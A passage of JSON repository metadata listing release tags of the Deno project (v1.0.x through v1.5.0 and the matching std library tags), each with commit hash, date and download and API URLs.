},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.